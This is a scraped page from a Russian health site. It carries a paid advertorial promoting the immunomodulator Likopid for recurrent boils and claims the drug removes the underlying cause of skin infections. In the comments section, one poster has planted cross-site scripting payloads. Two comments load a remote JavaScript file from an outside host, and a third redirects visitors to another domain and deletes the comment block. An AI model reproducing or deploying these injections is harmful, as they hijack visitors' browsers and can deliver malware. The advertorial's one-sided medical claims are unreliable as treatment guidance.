Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Ликопид в борьбе за здоро...  >>  Ликопид в борьбе за здоровье кожи!
 
Обратная связь
 

Ликопид в борьбе за здоровье кожи!

Размер шрифта
16 апреля 2015 00:00
  • google_analytics: false
  • Нравится

Скоро пляжный сезон, хочется гладкой и загорелой кожи, но с такой проблемой, как фурункулёз, на пляже даже показаться страшно. Фурункулы появляются всегда неожиданно и в очень неприятных местах — на носу, лбу, но чаще на спине или ягодицах.

Самостоятельно фурункулёз проходит крайне редко, зачастую требует медицинского, а порой даже хирургического вмешательства.  Причиной частого появления фурункулов на коже, носящего название «рецидивирующий фурункулез», является  развитие стафилококковой инфекции в волосяных фолликулах. В последние годы отмечается неуклонный рост числа больных, обращающихся по поводу лечения  инфекционно-воспалительных заболеваний кожи, среди которых не только острый и хронический рецидивирующий фурункулёз, но и часто возникающие ячмени и пиодермии (гнойничковые поражения кожи). При этом отмечено, что традиционная терапия  такого рода заболеваний бывает далеко не всегда эффективна.

Золотистый стафилококк – коварный враг, умеющий защищаться от воздействия антибиотиков.  Даже после курса антибактериальной терапии избавиться от него удается не всегда. Поэтому, чтобы справиться с фурункулами, нужен комплексный подход к лечению, включающий целый ряд мероприятий.

При фурункулёзе выбор методов лечения зависит от степени и стадии развития фурункулов. Традиционно назначается терапия антибиотиками, подобранными с учётом чувствительности бактерий. При необходимости хирургического вмешательства проводится  вскрытие фурункулов для удаления очага инфекции. Однако этих мер может быть недостаточно.

Основная причина постоянных обострений заболевания является «слабость»  фагоцитов – клеток, которые первыми принимают  на себя бактериальную атаку  и переваривают всё чужеродное. Если эти клетки-защитники ослабли от прошлых атак, они не способны полноценно уничтожить инфекцию. Стафилококки беспрепятственно проникают в волосяной мешочек и начинают размножаться в нем, постепенно «захватывая»  близлежащие волосяные луковицы. И воспаление повторяется вновь и вновь. А если человек чувствителен к различным аллергенам, проще говоря, склонен к аллергиям, то течение фурункулёза, скорее всего, будет тяжёлым. Зная о подобном механизме заболевания, логично предполагать актуальность укрепить защитные силы организма.

При упорном, многократно повторяющемся фурункулезе для того, чтобы  укрепить «передовую» линию борьбы с инфекцией в комплексе с  антибиотиками рекомендуется принимать  препараты с иммуномодулирующим действием.

Средством, способным восстановить первую линию обороны от бактерий и справиться с чередой обострений, является Ликопид 1 мг. Этот препарат стимулирует функциональную активность важных клеток-защитников иммунной системы. Поэтому его рекомендуется включать в комплексное лечение фурункулеза, как у взрослых,  так и у детей.

При лечении рецидивирующего фурункулёза в ходе клинических испытаний Ликопид показал наибольшую эффективность в комплексе с другими мероприятиями,  направленными на  повышение общей устойчивости организма к заболеванию: коррекция питания, витаминотерапия, санация очагов хронической  инфекции, лечение дисбактериоза кишечника и  др.

Причиной  местного  воспаление кожных покровов могут являться бактерии, как при фурункулёзе, грибы, вирусы, но вне зависимости от возбудителя возникновение  этих заболеваний обусловлено не только  местным поражением целостности кожи, но и  нарушениями нормального функционирования и взаимодействия различных звеньев иммунной системы. Поэтому, решая вопросы лечения гнойно-воспалительных заболеваний кожи и мягких тканей, Ликопид 1 мг работает над устранением  причины этих заболеваний – вторичного иммунодефицита!

Статья опубликована на правах рекламы
  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:23

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 21:20

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:14

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Новогодние подарки для вашей кожи   Вы чешетесь из-за вашего дома   Почему если почесать, то снова чешется?   Что делать с сухой кожей?  
28 декабря 2012Дед Мороз – красный нос: не от холода, а от бактерий 02 августа 2011Виноград защищает от ультрафиолета
 
11 сентября 2012Солнечные ожоги снижают риск рака кожи! 16 февраля 2012Умная повязка для ран
 

Слайдшоу

1
Прыщи: как не портить себе жизнь
Я уже взрослая, а все с прыщами! Как от них избавиться?
10 способов изуродовать свою кожу

Тесты

1
Мифы о прыщах
Профессиональный оценщик кожи
Как выявить контактный дерматит?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.